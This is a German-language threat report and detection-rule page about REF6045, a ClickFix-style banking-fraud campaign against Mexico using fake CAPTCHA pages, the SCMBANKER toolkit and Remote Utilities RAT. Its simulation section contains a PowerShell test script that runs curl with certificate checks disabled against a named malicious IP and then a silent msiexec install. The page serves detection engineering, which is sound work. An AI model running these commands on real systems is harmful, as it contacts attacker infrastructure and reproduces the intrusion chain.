ClickFix zur Auszahlung: Eine mexikanische Werkzeugkiste für Bankbetrug entschlüsseln
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
REF6045 ist eine von einem Operator unterstützte Betrugskampagne im Bankwesen, die sich auf den mexikanischen Finanzsektor konzentriert. Sie verwendet eine ClickFix-ähnliche Zustellmethode mit gefälschten CAPTCHA-Seiten, um die Opfer dazu zu bewegen, schädliche PowerShell-Befehle auszuführen. Nach der Infektion ermöglicht das SCMBANKER-Toolkit menschlichen Operatoren, Bankvorgänge zu beobachten, Screenshots anzufertigen, Inhalte der Zwischenablage zu ändern und Remote Utilities RAT zur vollständigen Fernsteuerung bereitzustellen.
Untersuchung
Elastic Security Labs entdeckte die Bedrohung, nachdem sie verdächtige bitsadmin -Aktivitäten beim Herunterladen von PowerShell-Skripten aus einem offenen Verzeichnis entdeckt hatten. Die Untersuchung legte das vollständige Toolkit durch ein öffentlich zugängliches Web-Root-Archiv offen, zkt.zip, und enthüllte erhebliche operative Sicherheitslücken, einschließlich nicht authentifizierter Dateieditoren und offener Verzeichnisse in der Command-and-Control-Infrastruktur. Die Analyse zeigte auch, dass das Toolkit umfangreiche AI-generierte Artefakte in seiner Codebasis enthält.
Abschwächung
Organisationen sollten die Verwendung von PowerShell und bitsadmin auf genehmigte Benutzer beschränken und strenge Ausführungskontrollen durchsetzen. Benutzer sollten geschult werden, Social-Engineering-Köder wie gefälschte CAPTCHA-Aufforderungen oder gefälschte Windows Update-Bildschirme zu erkennen. Sicherheitsteams sollten außerdem eine starke Überwachung auf verdächtige Registry-Änderungen und die unbefugte Installation von Fernzugriffsoftware bereitstellen.
Reaktion
Wenn diese Aktivität erkannt wird, isolieren Sie betroffene Systeme sofort, um die Command-and-Control-Kommunikation und möglichen Datendiebstahl zu stoppen. Führen Sie eine forensische Untersuchung durch, um den Umfang der Kompromittierung zu bestimmen und prüfen Sie auf Remote Utilities oder unautorisierte Registry-Änderungen. Setzen Sie Passwörter für alle Finanz- und andere sensible Konten zurück, die von den betroffenen Maschinen aus zugegriffen wurden.
Angriffsfluss
Erkennungen
MsiExec durch Shell-Prozess gestartet (über cmdline)
Ansehen
Attrib-Ausführung um Dateien zu verstecken (über cmdline)
Ansehen
Verdächtige Dateien im öffentlichen Benutzerprofil (über file_event)
Ansehen
Möglichkeit der Ausführung durch versteckte PowerShell-Befehlszeilen (über cmdline)
Ansehen
Herunterfahren zur Erzwungenen Systemanhalten oder Neustart verwendet (über cmdline)
Ansehen
LOLBAS Bitsadmin (über cmdline)
Ansehen
Mögliches verzögertes Ausführungsverhalten (über cmdline)
Ansehen
Mögliche Konto- oder Gruppenermittlung / -manipulation (über cmdline)
Ansehen
Microsoft Edge startet ungewöhnlichen Prozess (über cmdline)
Ansehen
Verdächtige CURL-Nutzung (über cmdline)
Ansehen
Verdächtige Ausführungs-/Skriptposition über [cmd.exe /C] (über cmdline)
Ansehen
Erkennung von SCMBANKER und Installation von Remote Utilities [Windows-Prozess-Erstellung]
Ansehen
Aktivitätserkennung des SCMBANKER-Toolkits [Windows Powershell]
Ansehen
Simulationsausführung
Voraussetzung: Der Telemetrie- & Baseline-Vorflug-Check muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der gegnerischen Technik (TTP), die darauf abzielt, die Erkennungsregel auszulösen. Die Befehle und der Text MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, genau die Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht verwandte Beispiele führen zu Fehldiagnosen.
-
Angriffsnarrative & Befehle: Der Gegner beabsichtigt, einen Fuß in das Zielsystem zu fassen, indem er das Muster der REF6045-Betrugskampagne imitiert. Zuerst versuchen sie, eine Validierungsdatei von einer fest codierten bösartigen IP-Adresse herunterzuladen (
68.211.161.46) mitcurlmit der-k(unsicher) Option, um die SSL-Zertifikatsvalidierung zu umgehen. Nach dem Download führt der Gegner eine stille Installation eines bösartigen Fernzugriffstools durch, indem ermsiexec.exemit der/i(installieren) und/quiet(still) Schalter verwendet und eine Datei namenshosts.msiZiel. Dies bietet ihnen beständigen Fernzugriff, während die Benutzerinteraktion minimiert wird. -
Regressionstest-Skript:
# Simulationsskript für REF6045 TTPs # Dieses Skript imitiert die spezifischen Befehlszeilen, die in der Erkennungsregel definiert sind. $WorkDir = "$env:TEMPSimulation" if (!(Test-Path $WorkDir)) { New-Item -ItemType Directory -Path $WorkDir } Set-Location $WorkDir Write-Host "[+] Schritt 1: Simulation des Ingress-Tool-Transfers via curl..." -ForegroundColor Cyan # Hinweis: Verwendung einer gefälschten Datei über curl zur Vermeidung von tatsächlichem bösartigem Datenverkehr, # aber die genaue Befehlszeilenzeichenfolge, die für die Erkennung erforderlich ist, wird beibehalten. cmd /c curl -k https://68.211.161.46/validation.txt Write-Host "[+] Schritt 2: Simulation der stillen MSI-Installation..." -ForegroundColor Cyan # Erstellen Sie eine Dummy-MSI-Datei, damit msiexec nicht sofort fehlschlägt (obwohl die Regel auf der Befehlszeile ausgelöst wird) # Zum Zweck des reinen Testens der ERKENNUNGSLOGIK (der Befehlszeile), # werden wir die genaue Befehlszeichenfolge ausführen. msiexec /i "hosts.msi" /quiet /norestart -
Bereinigungsskripte:
# Bereinigungsskript zum Entfernen von Artefakten $WorkDir = "$env:TEMPSimulation" if (Test-Path $WorkDir) { Remove-Item -Recurse -Force $WorkDir Write-Host "[+] Bereinigung abgeschlossen: $WorkDir entfernt." -ForegroundColor Green } else { Write-Host "[!] Bereinigung übersprungen: Verzeichnis nicht gefunden." -ForegroundColor Yellow }